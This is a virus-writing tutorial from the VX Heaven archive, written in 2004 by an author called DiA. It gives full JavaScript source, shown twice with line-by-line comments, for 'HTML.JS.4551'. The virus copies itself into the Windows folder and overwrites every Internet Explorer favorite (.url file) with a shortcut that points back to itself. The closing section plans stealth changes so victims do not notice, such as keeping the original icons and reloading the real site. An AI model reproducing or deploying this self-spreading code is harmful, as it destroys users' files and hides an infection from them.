Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Your favorites, my victims - .url infection in JavaScript

DiA
Ready Rangers Liberation Front [5]
May 2004

[Back to index] [Comments]

Intro

Everybody has favorite site's in the i-net. But they can't remember all the URL's, so they add every site they use to the "favorites". You can found them on IE under menu "favorites" (what else?!). But you will only see the page's title, like "VX Heavens" or "vx - DiA" ;). But where are the link's to this sites? It store's as *.url file in the "favorites" folder in windows, like "C:\Windows\Favorites". In this tut we want to overwrite this *.url files, with a .url file linked to our Virus. Let's do this...

...have fun!

URL file format

[InternetShortcut]hey windows, it's a InternetShurtcut!
URL=http://www.vx-dia.de.vu/the linked site, our virus will be in location "file:///C:\Windows\4551.htm"
WorkingDirectory=C:\WINDOWS\not interresting for this tut
ShowCommand=7not interresting for this tut
IconIndex=1not interresting for this tut
IconFile=C:\WINDOWS\SYSTEM\url.dllnot interresting for this tut
Modified=20F06BA06D07BD014Dnot interresting for this tut
HotKey=1601not interresting for this tut

Code with description

First without description:

<html>
<head>
<script language="JavaScript">

ThisFile = location.href;

if (ThisFile.indexOf("file:///") != -1) {

        wshell = new ActiveXObject("WScript.Shell");
        fso = new ActiveXObject("Scripting.FileSystemObject")

        FavFolder = wshell.SpecialFolders("Favorites") + "\\";
        WinFolder = fso.GetSpecialFolder(0) + "\\";

        ThisFile = location.href.substr(8);
        Virus = fso.GetFile(ThisFile);

        Virus.Copy(WinFolder + "4551.htm");

        fso.CreateTextFile(WinFolder + "4551.url");
        URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0);
        URLFile.WriteLine("[InternetShortcut]");
        URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm");
        URLFile.Close();
        FakeURL = fso.GetFile(WinFolder + "4551.url");

        Favorit = fso.GetFolder(FavFolder);
        FindFile = new Enumerator(Favorit.Files);
        FindFile.moveFirst();

        while (FindFile.atEnd() == false) {
                Victim = FindFile.item();

                URLType = new String(Victim);
                len = URLType.length;

                if (URLType.indexOf("url",len-3) != -1) {
                        FakeURL.Copy(Victim);
                }

                FindFile.moveNext();
        }
}

else {
        alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu");
}

</script>
</head>

<body link="#000000" alink="#000000" vlink="#000000">
<div align="center">
<h1>HTML.JS.4551 - *.url infection sample</h1><br><br>

by DiA (c)04 GermanY<br>
<a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br>
<a href="mailto:[email protected]">[email protected]</a></div>
</body>
</html>
 

And now with description for better understanding, but ugly lookin ;) :

<html>
<head>
<script language="JavaScript">

// we do it in JavaScript


ThisFile = location.href;

//looks like "file:///C:\Tests\4551.htm"


if (ThisFile.indexOf("file:///") != -1) {

// only run virus if location is "file:///" and not "http://"


        wshell = new ActiveXObject("WScript.Shell");
        fso = new ActiveXObject("Scripting.FileSystemObject")

// create wshell to read the "Favorites" path
// create fso to handle files


        FavFolder = wshell.SpecialFolders("Favorites") + "\\";
        WinFolder = fso.GetSpecialFolder(0) + "\\";

// save "Favorites" path to infect .url files
// save "Windows" path to copy virus, and drop Fake .url file


        ThisFile = location.href.substr(8);
        Virus = fso.GetFile(ThisFile);

// remove "file:///" to handle with the path
// get virus file, to copy it


        Virus.Copy(WinFolder + "4551.htm");

// copy virus to Windows\4551.htm, like "C:\Windows\4551.htm"


        fso.CreateTextFile(WinFolder + "4551.url");
        URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0);
        URLFile.WriteLine("[InternetShortcut]");
        URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm");
        URLFile.Close();
        FakeURL = fso.GetFile(WinFolder + "4551.url");

// create FakeURL file, every time
// write the path to the virus in this .url
// now 4551.url looks like:
//  [InternetShortcut]
//  URL=file:///C:\Windows\4551.htm
// if you execute this 4551.url, you will see the virus again ;)


        Favorit = fso.GetFolder(FavFolder);
        FindFile = new Enumerator(Favorit.Files);
        FindFile.moveFirst();

// get favorite folder to handle with it
// create a new enumerator to find all (!) files in this directory
// find first file


        while (FindFile.atEnd() == false) {

// do a while(), to find all files in one directory
// if no more files -> exit while()


                Victim = FindFile.item();

// save path of victim, like "C:\Windows\Favorites\GMX.url"


                URLType = new String(Victim);
                len = URLType.length;

// create a new string object of the victim path, to handle with
// get lenght of the path, to check extensions of files


                if (URLType.indexOf("url",len-3) != -1) {

// infect only if last 3 char's contains "url"


                        FakeURL.Copy(Victim);

// overwrite victim with dropped FakeURL file


                }

                FindFile.moveNext();

// Find next file in "favorites" folder


        }
}

// end if


else {
        alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu");
}

// if we are on another location (like ftp:// or http://) show only a message, and DON'T run
// virus file


</script>
</head>

<body link="#000000" alink="#000000" vlink="#000000">
<div align="center">
<h1>HTML.JS.4551 - *.url infection sample</h1><br><br>

by DiA (c)04 GermanY<br>
<a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br>
<a href="mailto:[email protected]">[email protected]</a></div>
</body>
</html>
 

Idea's and Goal's

The user will check that somethin is wrong, when no favorite work's anymore! So we must find a way to infect .url's, but load the site that should be load! So, we must read first the real URL before overwrite the .url.

Maybe we found the file "vx - DiA.url":

  1. Read real URL from this file
  2. store it in another file, like "vx - DiA.txt"
  3. overwrite this file with FakeURL file

When the "vx - DiA.url" are executed, the virus will do the work:

  1. Infect files
  2. read real URL from "vx - DiA.txt"
  3. load this site

I am workin on this method, but the problem is that every .url is not the same like:

[InternetShortcut]
URL=http://www.vx-dia.de.vu

Someone look's like:

[DEFAULT]
BASEURL=http://www.f-prot.de/down/tools-f.php

[InternetShortcut]
URL=http://www.f-prot.de/down/tools-f.php
IconFile=http://www.f-prot.de/favicon.ico
IconIndex=1

Another problem is, that most .url files has a own Icon, so we must read the icon location and write this locatin in our FakeURL file, that it look's like:

[InternetShortcut]
URL=file:///C:\Windows\4551.htm
IconFile=http://www.f-prot.de/favicon.ico
IconIndex=1

I am working on this problem's, and write a HTML.JS Virus:

Outro

I hope you enjoyed this little tutorial, if you had any comment's send me a mail to [email protected] ! That's all at this time, now i go on with the problem's =)

Have fun... Code on...

bye, DiA [06.05.04 - GermanY]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua